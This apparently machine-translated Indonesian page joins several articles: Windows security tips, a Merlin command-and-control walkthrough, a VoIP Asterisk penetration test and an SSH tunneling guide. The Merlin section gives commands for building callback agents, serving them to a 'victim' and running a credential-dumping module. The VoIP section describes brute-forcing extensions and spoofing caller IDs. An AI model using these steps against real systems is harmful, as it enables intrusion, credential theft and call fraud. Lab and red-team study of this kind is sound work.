Di luar anti-virus, ada baiknya menjalankan pemeriksaan sesekali untuk rootkit tersembunyi menggunakan Kaspersky’s TDSSKiller .

Perlindungan browser

Browser web adalah antarmuka Anda ke internet, dan karenanya kemungkinan besar akan diserang. Sebagian besar browser terkemuka cukup aman, jika terus diperbarui, dan Google Chrome mungkin yang paling aman. Meskipun Chrome memiliki jumlah kerentanan tertinggi , mereka ditambal dengan cepat, dan memiliki “kotak pasir” untuk membantu mengisolasinya dari sisa PC Anda. Karena itu penyerang perlu dua eksploitasi: satu untuk browser Chrome dan satu untuk kotak pasir. Jika Anda membutuhkan keamanan lebih, Anda dapat menjalankan program apa pun di kotak pasirnya sendiri, menggunakan Sandboxie .

Gizmo Freeware juga menyarankan penggunaan DropMyRights untuk mengurangi kerusakan yang dapat dilakukan malware saat Anda berselancar.

Gunakan Qualys BrowserCheck atau situs web serupa untuk memeriksa apakah semua plug-in browser Anda mutakhir.

Sebagian besar serangan daring menggunakan JavaScript, sehingga Anda dapat meningkatkan keamanan dengan mematikannya. Sayangnya, banyak situs web dan sebagian besar aplikasi berbasis web menggunakan sekumpulan JavaScript yang luas, jadi ini mungkin tidak praktis, tetapi menggunakan NoScript (atau mungkin ScriptSafe untuk Chrome ) memungkinkan Anda lebih mengontrol tempat skrip dijalankan. Apa pun caranya, matikan skrip lintas situs . Saya juga menggunakan Ghostery , tapi itu lebih untuk privasi dan pemblokiran iklan daripada keamanan.

Untuk pengguna yang berisiko tinggi, mungkin perlindungan utama adalah mem-sandbox semua komputasi Anda dengan menggunakan mesin sementara atau virtual. Cara paling sederhana untuk melakukan ini adalah dengan mem-boot sistem operasi baru dari Live CD atau USB thumb drive – biasanya Linux tetapi bisa Windows – dan kemudian membuang semuanya setelah itu. Dengan Returnil SystemSafe , Anda dapat memunculkan klon dari lingkungan operasi Anda saat ini dan membuangnya setelah Anda selesai menggunakannya. Beberapa orang menggunakan program “PC virtual” seperti Oracle’s VirtualBox untuk tujuan yang sama.

Ancaman yang masuk

Komputer apa pun yang daring akan menemukan port-portnya dipindai dari komputer lain, beberapa di antaranya adalah worm (virus), dan beberapa di antaranya mungkin penyerang manusia. Oleh karena itu penting untuk memiliki firewall, dan yang dibangun ke dalam Windows 7 dan 8 cukup baik untuk sebagian besar pengguna. Jika Anda menginginkan perlindungan lebih, ada banyak alternatif, dan Anda mungkin sudah membeli satu sebagai bagian dari rangkaian keamanan. Jika tidak, baca panduan Gizmo tentang Perlindungan Firewall Gratis Terbaik .

PC Anda harus memiliki beberapa port terbuka untuk terhubung ke internet, tetapi semua port Anda harus ditutup atau “diam-diam”. Jalankan tes firewall di AuditMyPC atau GRC (Shields UP) dll. CurrPorts kecil NirSoft akan memberi tahu Anda port mana yang sedang digunakan PC Anda, jika Anda ingin memeriksa aktivitas mencurigakan.

Karena curiga secara alami, saya menjalankan Process Explorer dan TCPView SysInternal , dan GlassWire , untuk menonton apa yang dilakukan PC saya, tetapi ini terlalu banyak untuk diharapkan dari pengguna PC rumahan yang normal.

Untuk pengguna yang sangat berisiko tinggi, atau jaringan perusahaan, perlindungan utama adalah dengan menggunakan PC atau server terpisah sebagai DMZ (zona demiliterisasi). Namun, PC Anda mungkin berada di belakang perute NAT yang melakukan terjemahan alamat jaringan antara internet eksternal dan jaringan internal Anda, dan ini melindungi terhadap banyak lalu lintas masuk . Tentu saja, penting untuk memastikan router Anda dilindungi oleh kata sandi yang kuat, bukan bawaan apa pun yang mungkin dikirimkan. Juga, jika itu adalah router nirkabel, Wi-Fi Anda harus diatur untuk menggunakan enkripsi WPA2 (Wi-Fi Protected Access) untuk keamanan. Sistem WEP (Wired Equivalent Privacy) yang lama dapat dipecahkan dalam hitungan menit.

Singkatnya: sebagian besar pengguna Windows biasa tidak masalah dengan Windows sebagaimana dikirimkan, jika semua pertahanannya dihidupkan dan semua perangkat lunak tetap diperbarui. Jika Anda berisiko, Anda dapat menginstal program yang meningkatkan tingkat keamanan. Setelah itu, risiko terbesar adalah rekayasa sosial, bahkan jika itu hanya membuat Anda mengklik sesuatu yang Anda tahu tidak seharusnya.

Orang-orang yang membutuhkan perlindungan tingkat tinggi mungkin merasa perlu mengikuti lebih banyak tip yang diuraikan di atas, tetapi jika Anda sedang ditargetkan oleh GCHQ atau agen tiga huruf Amerika (atau yang setara dengan Cina atau Rusia), maka Anda harus mengambil langkah lebih drastis.

Panduan Perintah dan Kontrol untuk Merlin

Panduan Perintah dan Kontrol untuk Merlin – Merlin adalah alat Komando dan kontrol lintas-platform yang hebat yang ditulis dalam bahasa Go. Itu terbuat dari dua elemen yaitu server dan agen. Ini bekerja pada protokol HTTP / 2. Hal terbaik tentang Merlin adalah bahwa ia dikompilasi untuk bekerja pada platform apa pun dan bahwa Anda bahkan dapat membangunnya dari sumber. Biasanya, agen diletakkan di windows dan didengarkan di Linux tetapi karena ditulis dalam bahasa Go, Merlin memungkinkan kami menempatkan agen di platform / mesin apa pun yang kami temui dan kami dapat mendengarkannya juga di platform apa pun. Ini jauh lebih sukses daripada yang lain ketika datang ke tim merah karena IDS / IPS berjuang untuk mengidentifikasi itu.

Server Merlin akan dijalankan di folder tempat agen dapat memanggilnya. Secara default, server dikonfigurasi pada 127.0.0.1:443 tetapi Anda dapat mengubahnya ke IP Anda sendiri. Agen merlin dapat, seperti dibahas sebelumnya, rumit untuk dijalankan pada platform apa pun. Agen berinteraksi menggunakan server Merlin. File biner dijalankan dengan variabel path target.

Instalasi
Instalasi Merlin cukup rumit. Cara mengunduh yang paling nyaman ditunjukkan dalam artikel ini. Memasang bahasa Go adalah wajib agar Merlin berfungsi. Jadi, untuk menginstal jenis bahasa Go:

apt install golang
apt install golang
Dan kemudian menginstal merlin perintah berikut:

mkdir /opt/merlin;cd /opt/merlin
wget //github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z
mkdir /opt/merlin;cd /opt/merlin
wget //github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z

Setelah perintah di atas berhasil dijalankan, gunakan perintah berikut untuk unzip merlin server.

7z x merlinServer-Linux-x64-v0.1.4.7z
1
7z x merlinServer-Linux-x64-v0.1.4.7z

Sekarang, setelah membuka ritsleting, ketika Anda menggunakan perintah ls; Anda akan menemukan server merlin dan file readme. Kami dapat memeriksa apakah server berjalan dengan menggunakan perintah berikut:

./merlinServer-Linux-x64
./merlinServer-Linux-x64

Dalam “README.MD”, kami menemukan instruksi untuk menginstal “Merlin” di sistem kami.

Sekarang sesuai dengan file readme, kita harus mengatur variabel lingkungan GOPATH untuk instalasi dan kemudian menginstal merlin menggunakan “go” bukan git clone. Jadi, untuk menyelesaikan langkah-langkah ini jalankan serangkaian perintah berikut:

echo “export GOPATH=$HOME/go” >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin
echo “export GOPATH=$HOME/go” >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin
Setelah direktori diunduh, mari kita periksa isinya menggunakan perintah cd dan ls.

Ada direktori cmd, dan di dalamnya, ada direktori bernama merlinserver tempat kami menemukan main.go. Jalankan main.go seperti yang ditunjukkan pada gambar di bawah ini:

go run main.go
1
go run main.go

Seperti yang Anda lihat alat merlin masih tidak berjalan dengan baik karena tidak ada sertifikat SSL yang diberikan kepadanya. Jika Anda menavigasi direktori / opt / merlin, Anda akan menemukan direktori yang bernama data di mana terdapat sertifikat SSL. Salin folder data ke direktori merlinserver seperti yang ditunjukkan pada gambar di bawah ini:

Sekarang jika Anda menjalankan merlin menggunakan perintah: go run main.go , server merlin akan berjalan dengan sukses.

Sekarang menggunakan perintah bantuan berikut yang dapat Anda lihat, seperti yang ditunjukkan pada gambar, argumen yang dapat Anda gunakan untuk menjalankan perintah Anda seperti yang diinginkan:

go run main.go -h
go run main.go -h

Eksploitasi Windows
Sekarang, untuk membuat agen Merlin untuk windows ketik perintah berikut:

GOOS=windows GOARCH=amd64 go build -ldlags “-X main.url=//192.168.0.11:443” -o shell.exe main.go

GOOS=windows GOARCH=amd64 go build -ldlags “-X main.url=//192.168.0.11:443” -o shell.exe main.go
Sekarang, bagikan shell dengan target menggunakan server python:

python -m SimpleHTTPServer 80

python -m SimpleHTTPServer 80

Untuk membuat pendengar agar shell kembali, gunakan perintah berikut:

go run main.go -i 192.168.0.11

go run main.go -i 192.168.0.11

Dan seperti itu, Anda akan memiliki sesi Anda seperti yang ditunjukkan pada gambar di atas. Sekarang, gunakan perintah bantuan untuk melihat semua opsi seperti yang ditunjukkan pada gambar di bawah ini:

Ketik sesi untuk melihat daftar sesi yang Anda peroleh seperti yang ditunjukkan pada gambar di bawah ini:

Untuk mengakses daripada sesi yang tersedia, gunakan perintah berikut:

interact <session name>

interact <session name>

Saat Anda telah mengakses sesi, di sini Anda dapat menggunakan perintah windows seperti:

shell ipconfig

shell ipconfig

Kemudian selanjutnya Anda dapat menggunakan berbagai modul eksploitasi pos, daftar yang ditunjukkan pada gambar di bawah ini:

Eksploitasi pasca Windows
Kami akan menggunakan modul di sini untuk membuang kredensial windows dan untuk mengaktifkan jenis modul pasca eksploitasi tersebut:

use module windows/x64/powershell/credentials/dumpCredStore
use module windows/x64/powershell/credentials/dumpCredStore

Seperti yang Anda lihat pada gambar di atas bahwa perintah info memberi kita semua detail tentang modul termasuk opsi yang perlu kita tentukan dalam modul. Jadi, oleh karena itu, mari kita tentukan opsi:

set agent <agent name>
run
set agent <agent name>
run

Eksploitasi Linux
Sekarang, kami akan membuat agen merlin untuk mesin Linux. Untuk ini, cukup ketik perintah berikut:

Export GOOS=linux;export GOARCH=amd64; go build -ldflags “-s -w -X main.url=//192.168.0.11:443” -o shell.elf main.go
Export GOOS=linux;export GOARCH=amd64; go build -ldflags “-s -w -X main.url=//192.168.0.11:443” -o shell.elf main.go
Setelah perintah dieksekusi, malware Anda akan dibuat. Gunakan python untuk berbagi file dengan korban seperti yang ditunjukkan pada gambar di bawah ini atau melihatnya cocok. Untuk memulai server HTTP python:

python -m SimpleHTTPServer 80
python -m SimpleHTTPServer 80

Atur pendengar dan tunggu file dieksekusi.

go run main.go -I 192.168.0.11
go run main.go -I 192.168.0.11

Dan seperti yang ditunjukkan pada gambar di atas, Anda akan memiliki sesi Anda. Kemudian ketik sesi untuk melihat daftar sesi yang didapat.

Kemudian untuk mengakses sesi gunakan perintah berikut:

interact <session name>

interact <session name>

Selanjutnya, Anda dapat menggunakan perintah Linux seperti:

shell ls
shell ls

Linux pasca eksploitasi
Bahkan di Linux, Anda dapat lebih lanjut menggunakan sejumlah modul pasca-eksploitasi. Yang akan kita gunakan dalam artikel ini adalah privesc / LinEnum:

use module linux/x64/bash/priesc/LinEnum
use module linux/x64/bash/priesc/LinEnum

Melalui perintah info, kita tahu bahwa kita harus memberikan sesi untuk menjalankan modul ini. Jadi, ketik:

set agent <session name>
run
set agent <session name>
run

Dan dengan cara ini modul Anda akan berjalan. Cobalah dan bekerja dengan alat Merlin c2 sebagai salah satu yang terbaik dan karena Anda dapat melihat betapa nyamannya crossed-platformed.

Penulis: Sayantan Bera adalah seorang penulis teknis di peretasan artikel dan penggila keamanan siber . Hubungi di sini

Pengujian Penetrasi pada VoIP Asterisk Server

Pengujian Penetrasi pada VoIP Asterisk Server – Hari ini kita akan belajar tentang Pengujian Penetrasi VoIP ini termasuk, cara penghitungan, pengumpulan informasi, ekstensi Pengguna, dan penghitungan kata sandi, pembajakan registrasi dan spoofing pendaftaran.

Pengantar VoIP

VoIP berarti Voice over Internet Protocol, itu disebut IP telephony, VoIP digunakan untuk tujuan komunikasi. Teknologi VoIP memungkinkan Anda untuk membuat panggilan audio menggunakan koneksi Internet alih-alih telepon biasa (Telepon rumah, ponsel). Beberapa mitra VoIP hanya memungkinkan Anda menelepon orang lain menggunakan layanan yang sama, tetapi yang lain memungkinkan Anda menelepon siapa saja yang memiliki nomor telepon – termasuk nomor lokal, jarak jauh, seluler, dan internasional. Juga, sementara beberapa layanan VoIP hanya berfungsi di komputer Anda atau telepon VoIP khusus (misalnya Cisco atau Polycom, dll.).

VoIP secara default menggunakan 5060 sebagai port pensinyalan SIP. Ini digunakan untuk registrasi Ketika telepon (misalnya Cisco, Polycom, dll.) Mendaftar dengan Asterisk pada port 5060.

Fungsionalitas penyebutan di bawah ini umumnya digunakan dalam instalasi VoIP yang tidak umum dalam jaringan teleponi lama:

  • Penggunaan beberapa jalur (jalur PRI, Garis BRI) dan ekstensi
  • Layanan pesan suara
  • Rekaman suara
  • Kontrol Administrasi
  • Daftarkan panggilan
  • Konfigurasi Modular
  • IVR dan pesan selamat datang

Protokol SIP

Session Initiation Protocol (SIP) memungkinkan kita menjalin komunikasi, mengakhiri atau mengubah panggilan suara atau video. Lalu lintas suara atau video ditransmisikan melalui protokol Real-Time Protocol (RTP). SIP adalah protokol lapisan aplikasi yang menggunakan UDP atau TCP untuk lalu lintas. Secara default, SIP menggunakan port 5060 UDP / TCP untuk lalu lintas tidak terenkripsi atau port 5061 untuk lalu lintas terenkripsi TLS. Seperti yang akan kita lihat nanti, vektor serangan Man-in-the-Middle (MITM) ada untuk semua jenis komunikasi, termasuk VoIP / SIP. Oleh karena itu, enkripsi adalah kontrol kompensasi yang diperlukan untuk tetap ada terlepas dari lingkungan atau metode layanan Protokol Inisiasi Sesi berdasarkan ASCII dan sangat mirip dengan protokol HTTP karena menggunakan Model Request / Response. Permintaan ke klien SIP dilakukan melalui SIP URI dan AGI melalui agen pengguna yang mirip dengan permintaan HTTP yang dibuat oleh browser web.

Permintaan SIP

Jenis permintaan berikut ini umum dalam SIP:

Sno. Permintaan Deskripsi
1. UNDANG Klien diundang untuk berpartisipasi dalam sesi panggilan
2. ACK Mengonfirmasi bahwa klien telah menerima tanggapan akhir atas permintaan INVITE
3. BYE Mengakhiri panggilan dan dapat dikirim oleh penelepon atau penelepon
4. MEMBATALKAN Menghapus permintaan yang tertunda
5. PILIHAN Meminta kemampuan server
6. DAFTAR Mendaftarkan alamat yang tercantum dalam bidang header dengan server SIP
7. PRACK Pengakuan Sementara
8. LANGGANAN Berlangganan untuk Acara Pemberitahuan dari Pemberitahu
9. MEMBERITAHUKAN Beri tahu pelanggan Acara baru
10. MENERBITKAN Menerbitkan acara ke Server
11. INFO Mengirim informasi pertengahan sesi yang tidak mengubah keadaan sesi
12. LIHAT Meminta penerima untuk mengeluarkan permintaan SIP (Transfer Panggilan)
13. PESAN Mengirim pesan instan menggunakan SIP

Berdasarkan memodifikasi keadaan sesi tanpa mengubah keadaan dialog

Respons SIP

Kita dapat memahami Responses menggunakan kode Response. Kategori umum dari kode Respon diberikan di bawah ini:

  • 1xx (Informasi)
  • 2xx (Sukses)
  • 3xx (Pengalihan)
  • 4xx (Permintaan gagal)
  • 5xx (Server web tidak dapat menyelesaikan permintaan)
  • 6xx (Kesalahan global)

Struktur Interaksi SIP

Struktur Interaksi SIP yang Khas terdiri dari yang berikut ini:

  1. Pengirim memulai permintaan INVITE.
  2. Penerima mengirim kembali respons 100 (Mencoba).
  3. Pengirim mulai berdering dengan mengirim respons 180 (Dering).
  4. Penerima mengangkat telepon dan 200 respons berhasil dikirim (OK).
  5. ACK dikirim oleh inisiator.
  6. Panggilan mulai menggunakan RTP.
  7. Permintaan BYE dikirim untuk mengakhiri panggilan.

Protokol Transportasi Real-time

RTP adalah protokol jaringan untuk mengirimkan audio dan video melalui jaringan. Protokol RTP digunakan dalam sistem komunikasi dan hiburan yang melibatkan media streaming seperti aplikasi telepon dan video atau telekonferensi. Port default RTP dari 16384 hingga 32767, port tersebut digunakan untuk panggilan sip. Dalam skenario kami, kami menggunakan kisaran port UDP 10000-20000 untuk RTP – aliran media, suara, dan saluran video.

Konfigurasi yang digunakan dalam Praktis

  • Penyerang:
    • OS: Kali Linux 2020.1
    • IP: 192.168.1.4
  • Target:
    • Server VOIP: Trixbox
    • Klien VOIP: Zoiper
    • IP: 192.168.1.7

Kami telah menerbitkan artikel tentang Cara Mengatur Server VoIP. Silakan baca sebelum melanjutkan. Kami akan menggunakan server yang sama yang kami konfigurasikan dalam artikel itu

Pengaturan Lab untuk Pengujian Penetrasi VOIP

Menyiapkan Kit VoIP Viproy

Sebelum memulai dengan Pengujian Penetrasi, kita perlu menambahkan kit Viproy-VoIP ke Metasploit kita. Prosedur terperinci tentang cara menambahkan modul di Metasploit dapat ditemukan di sini . Langkah-langkah yang digambarkan diambil dari Rapid7 dan Viproy Author.

Kami perlu menginstal beberapa dependensi. Pertama, kami akan memperbarui sumber kami dan kemudian menginstal dependensi berikut.

Setelah kita selesai menginstal semua dependensi, saatnya untuk mengkloning Repositori Viproy ke Kali Linux kita. Ini berisi modul yang perlu kita tambahkan di Kerangka Metasploit kami

Di sini kita dapat melihat bahwa kita memiliki direktori lib dan direktori modul serta skrip kaliinstall.

Sebelum menjalankan skrip, kita perlu menyalin secara manual isi direktori lib dan direktori modul ke direktori lib dan modul Metasploit.

Sekarang kita perlu membuat entri dari modul yang kita salin di File Mixins yang terletak di / usr / share / Metasploit-framework / lib / msf / core / auxiliary /.

Ini dapat dilakukan secara manual juga atau menggunakan editor teks lain.

Ini semua yang perlu kami lakukan. Jika metode ini tidak berhasil atau memberikan beberapa kesalahan. Penulis cukup berbaik hati untuk memberikan versi yang telah dikompilasi. Untuk menginstalnya kita akan mengikuti langkah-langkah ini.

Pertama, kita akan mengkloning versi yang sudah dikompilasi dari GitHub.

Kemudian kita akan melintasi direktori dan menginstal viproy menggunakan gem.

Itu akan memakan waktu. Setelah selesai, kita perlu memuat ulang modul di Metasploit Framework.

Itu adalah pemasangan Toolkit Viproy. Mari kita mulai Pengujian Penetrasi di Server VoIP kami.

Dalam jaringan VoIP, informasi yang dapat terbukti bermanfaat adalah gateway VoIP atau server, sistem IP-PBX, perangkat lunak klien (softphones) / telepon VoIP dan ekstensi pengguna. Mari kita lihat beberapa alat yang banyak digunakan untuk enumerasi dan sidik jari.

Mengidentifikasi Server SIP

Dengan menggunakan sip Metasploit Scanner Module mengidentifikasi sistem dengan menyediakan satu IP atau serangkaian alamat IP, kami dapat memindai semua Server VoIP dan opsi yang diaktifkan.

Di sini, kita dapat melihat bahwa pemindaian kami memberi kami Server VoIP berjalan pada 192.168.1.7. Kita juga dapat melihat bahwa ia memiliki Agen-Pengguna sebagai “Asterisk” dan kita dapat melihat bahwa ia memiliki beberapa Permintaan yang diaktifkan di atasnya.

Extension Bruteforce

Selanjutnya, kita akan melakukan brute-force pada server target untuk mengekstrak Extensions dan Passwords atau rahasia. Untuk latihan khusus ini, kami membuat 2 kamus. Satu untuk nama pengguna dan lainnya untuk kata sandi. Selanjutnya, kita perlu menentukan rentang untuk ekstensi. Kami memilih kisaran 0000000 hingga 99999999. Dan kemudian kami menjalankan exploit

Di sini, kita dapat melihat bahwa kami dapat mengekstrak 10 ekstensi. Pastikan rahasia yang kita siapkan untuk ekstensi sulit ditebak untuk mencegah kekerasan semacam ini.

Pendaftaran Ekstensi

Karena kami memiliki ekstensi dan rahasia. Sekarang saatnya untuk bergerak selangkah lebih maju dan mendaftarkan ekstensi sehingga kita dapat dapat memulai panggilan dari mesin penyerang. Kami memilih ekstensi 99999999. Kami meretas rahasianya menjadi 999. Sekarang, yang harus kami lakukan adalah memberikan alamat IP server dan ekstensi serta rahasia. Segera setelah kami menjalankan alat bantu, kami mendapat respons 200 OK dari server yang memberi tahu kami bahwa ekstensi terdaftar dengan Alamat IP ini.

Di sini, kita harus mendaftarkan perangkat lunak karena kita tidak memiliki jalur trunk atau jalur PSTN atau jalur PRI untuk melakukan panggilan keluar. Karenanya, kami menguji ekstensi untuk panggilan ekstensi.

Panggil Spoofing

Dalam praktik sebelumnya, kami mendaftarkan ekstensi 99999999, sekarang kami akan menggunakannya untuk memanggil ekstensi 00000000. Di sini kita dapat menipu ID Penelepon untuk apa pun yang kita inginkan. Kami telah mengaturnya ke Hacker. Kita perlu mendefinisikan login menjadi true sehingga kita bisa masuk ke server dengan rahasia 999. Kami juga harus menetapkan pengguna numerik benar sehingga dapat menerima ekstensi numerik.

Segera setelah kami menjalankan auxiliary, kita dapat melihat bahwa ada panggilan yang dimulai dari ekstensi 999999999 ke ekstensi 00000000 yang kami atur di Zoiper Client kami. Kita juga dapat melihat bahwa kita memiliki ID Penelepon Peretas yang kita atur di alat bantu.

Pemantauan Log

Kita dapat memantau log pada Server VoIP yang berisi informasi tentang semua panggilan yang dimulai, terhubung, dijatuhkan. Semua ekstensi dan informasi penting lainnya. Kami selalu dapat memaksa atau memeriksa kredensial default. Pertama, kita akan menghubungkan server menggunakan ssh dan kemudian kita akan menjalankan perintah berikut untuk membuka panel konsol asterisk. Panel ini merekam log secara real-time.

Mengendus Panggilan menggunakan Wireshark

Saat pengguna melakukan panggilan telepon, kami dapat mengamati lalu lintas SIP yang ditangkap menggunakan Wireshark. Kami meluncurkan Wireshark dan memilih adaptor jaringan tempat server VoIP bekerja. Lalu kami mulai menangkap paket. Jika kita perhatikan dengan seksama, kita dapat melihat bahwa ada tab yang disebut Telephony di Menu Wireshark. Di menu tarik-turun, kami memiliki opsi pertama “Panggilan VoIP”.

Segera setelah kami mengklik Panggilan VoIP, sebuah jendela terbuka menampilkan semua panggilan yang telah ditangkap selama sniffing. Kami melihat bahwa ada urutan paket dari satu Alamat IP ke alamat IP lainnya.

Jika kita mengklik tombol Sequence Flow di bagian bawah, kita bisa melihat jabat tangan SIP Communication yang kita pelajari di Pendahuluan.

Dalam gambar ini, kita dapat menganalisis panggilan secara mendetail. Dalam aliran panggilan SIP, ada beberapa transaksi SIP. Transaksi SIP terdiri dari beberapa permintaan dan jawaban dan cara untuk mengelompokkannya dalam transaksi yang sama menggunakan parameter CSeq: 103.

Langkah pertama adalah harus mendaftarkan ekstensi. Setelah perpanjangan pendaftaran sesuai dengan pembentukan sesi. Dari ekstensi, sesi 99999999 terdiri dari permintaan INVITE pengguna ke 00000000. Segera, proksi mengirimkan TRYING 100 untuk menghentikan siaran dan mengalihkan kembali permintaan ke ekstensi 00000000.

Ekstensi 00000000 mengirimkan Dering 180 ketika telepon mulai berdering dan juga dialihkan oleh proxy ke pengguna A. Akhirnya, pesan OK 200 terkait dengan proses penerimaan (ekstensi 00000000 merespons panggilan). Setelah menelepon server panggilan, coba tetapkan port RTP dan protokol transport RTP dimulai dengan parameter (port, alamat, codec, dll.) Dari protokol SDP. Transaksi terakhir sesuai dengan akhir sesi. Ini dilakukan hanya dengan permintaan BYE ke Proxy dan kemudian mengalihkan rute ke ekstensi 00000000.

Pengguna ini membalas dengan pesan OK 200 untuk mengonfirmasi bahwa pesan terakhir telah diterima dengan benar. Panggilan telah dimulai oleh pengguna yang bernama peretas dengan ekstensi 99999999 hingga ekstensi 00000000. Durasi panggilan dan status saat ini dapat dilihat pada contoh di atas. Wireshark mengumpulkan paket panggilan dan sekarang kita dapat mendengarkan seluruh panggilan telepon. Setelah memutus sambungan, kami memutar seluruh konversi panggilan telepon.

Ketika kami mengklik tombol Play Streams, ia akan menanyakan perangkat keluaran berdasarkan driver laptop Anda. Kemudian kita dapat mengklik Tombol Play dan kita dapat mendengar percakapan yang dibuat pada Panggilan VoIP itu.

Ini adalah salah satu artikel dalam serangkaian artikel yang saat ini kami teliti tentang VoIP. Tetap disini untuk informasi lebih lanjut!

Cara Membuat SSH Tunneling atau Port Forwarding di Linux

Cara Membuat SSH Tunneling atau Port Forwarding di Linux – Terowongan SSH (juga disebut sebagai penerusan port SSH) hanya merutekan lalu lintas jaringan lokal melalui SSH ke host jarak jauh. Ini menyiratkan bahwa semua koneksi Anda diamankan menggunakan enkripsi. Ini menyediakan cara mudah untuk mengatur VPN dasar ( Virtual Private Network ), berguna untuk menghubungkan ke jaringan pribadi melalui jaringan publik yang tidak aman seperti Internet.

Anda juga dapat digunakan untuk mengekspos server lokal di belakang NAT dan firewall ke Internet melalui terowongan yang aman, seperti yang diterapkan dalam ngrok .

Sesi SSH memungkinkan koneksi jaringan tunneling secara default dan ada tiga jenis penerusan port SSH: penerusan port lokal , jarak jauh dan dinamis .

Pada artikel ini, kami akan menunjukkan cara mengatur tunneling SSH dengan cepat dan mudah atau berbagai jenis penerusan port di Linux.

Untuk tujuan artikel ini, kami menggunakan pengaturan berikut:

Tuan Rumah Lokal : 192.168.43.31
Remote Host : Linode CentOS 7 VPS dengan hostname server1.example.com .
Biasanya, Anda dapat terhubung dengan aman ke server jauh menggunakan SSH sebagai berikut. Dalam contoh ini, saya telah mengonfigurasi login SSH tanpa kata sandi antara host lokal dan remote saya, sehingga belum meminta kata sandi admin pengguna.

Penerusan Port SSH Lokal

Jenis penerusan port ini memungkinkan Anda terhubung dari komputer lokal Anda ke server jarak jauh. Dengan asumsi Anda berada di belakang firewall pembatas, atau diblokir oleh firewall keluar dari mengakses aplikasi yang berjalan pada port 3000 pada server jauh Anda.

Anda dapat meneruskan port lokal (mis. 8080 ) yang kemudian dapat Anda gunakan untuk mengakses aplikasi secara lokal sebagai berikut. The -Lbendera mendefinisikan port diteruskan ke remote host dan port remote.

$ ssh [email protected] -L 8080: server1.example.com:3000

Menambahkan -Nbendera berarti tidak menjalankan perintah jarak jauh, Anda tidak akan mendapatkan shell dalam hal ini.

$ ssh -N [email protected] -L 8080: server1.example.com:3000

The -fmenginstruksikan beralih ssh ke berjalan di latar belakang.

$ ssh -f -N [email protected] -L 8080: server1.example.com:3000

Sekarang, di mesin lokal Anda, buka browser, alih-alih mengakses aplikasi jarak jauh menggunakan alamat server1.example.com:3000 , Anda cukup menggunakan localhost:8080atau 192.168.43.31:8080, seperti yang ditunjukkan pada tangkapan layar di bawah ini.

Remote SSH Port Forwarding

Penerusan port jarak jauh memungkinkan Anda terhubung dari mesin jarak jauh ke komputer lokal. Secara default, SSH tidak mengizinkan penerusan port jarak jauh. Anda dapat mengaktifkan ini menggunakan direktif GatewayPorts di file konfigurasi utama SSHD Anda / etc / ssh / sshd_config pada host jarak jauh.

Buka file untuk diedit menggunakan editor baris perintah favorit Anda.

$ sudo vim / etc / ssh / sshd_config
Cari arahan yang diperlukan, batalkan komentar dan atur nilainya yes, seperti yang ditunjukkan pada tangkapan layar.

GatewayPort ya
Aktifkan Penerusan Port SSH Jarak Jauh
Aktifkan Penerusan Port SSH Jarak Jauh

Simpan perubahan dan keluar. Selanjutnya, Anda perlu memulai kembali sshd untuk menerapkan perubahan terbaru yang Anda buat.

$ sudo systemctl restart sshd
ATAU
$ sudo service sshd restart
Selanjutnya jalankan perintah berikut untuk meneruskan port 5000 pada mesin jarak jauh ke port 3000 pada mesin lokal.

$ ssh -f -N [email protected] -R 5000: localhost: 3000
Setelah Anda memahami metode tunneling ini, Anda dapat dengan mudah dan aman mengekspos server pengembangan lokal, terutama di belakang NAT dan firewall ke Internet melalui terowongan yang aman. Terowongan seperti Ngrok , pagekite , localtunnel dan banyak lainnya bekerja dengan cara yang sama.

Penerusan Port SSH Dinamis
Ini adalah jenis port forwarding ketiga. Tidak seperti penerusan port lokal dan jarak jauh yang memungkinkan komunikasi dengan satu port, itu memungkinkan, berbagai komunikasi TCP melintasi berbagai port. Penerusan port dinamis mengatur mesin Anda sebagai server proxy SOCKS yang mendengarkan pada port 1080 , secara default.

Sebagai permulaan, SOCKS adalah protokol Internet yang mendefinisikan bagaimana klien dapat terhubung ke server melalui server proxy (SSH dalam kasus ini). Anda dapat mengaktifkan penerusan port dinamis menggunakan opsi -D .

Perintah berikut akan memulai proxy SOCKS pada port 1080 yang memungkinkan Anda untuk terhubung ke host jarak jauh.

$ ssh -f -N -D 1080 [email protected]
Mulai sekarang, Anda dapat membuat aplikasi pada mesin Anda menggunakan server proxy SSH ini dengan mengedit pengaturannya dan mengonfigurasinya untuk menggunakannya, untuk terhubung ke server jauh Anda. Perhatikan bahwa proksi SOCKS akan berhenti bekerja setelah Anda menutup sesi SSH Anda.

Baca Juga : 5 Cara Agar Sesi SSH Jarak Jauh Berjalan Setelah Menutup SSH

Ringkasan
Dalam artikel ini, kami menjelaskan berbagai jenis penerusan port dari satu mesin ke mesin lain, untuk mengalirkan lalu lintas melalui koneksi SSH yang aman. Ini adalah salah satu dari banyak kegunaan SSH. Anda dapat menambahkan suara Anda ke panduan ini melalui formulir umpan balik di bawah ini.

Perhatian : penerusan port SSH memiliki beberapa kelemahan yang besar, dapat disalahgunakan: dapat digunakan untuk mem-by-pass pemantauan jaringan dan program penyaringan lalu lintas (atau firewall). Penyerang dapat menggunakannya untuk kegiatan jahat. Pada artikel kami berikutnya, kami akan menunjukkan cara menonaktifkan penerusan port lokal SSH. Tetap terhubung!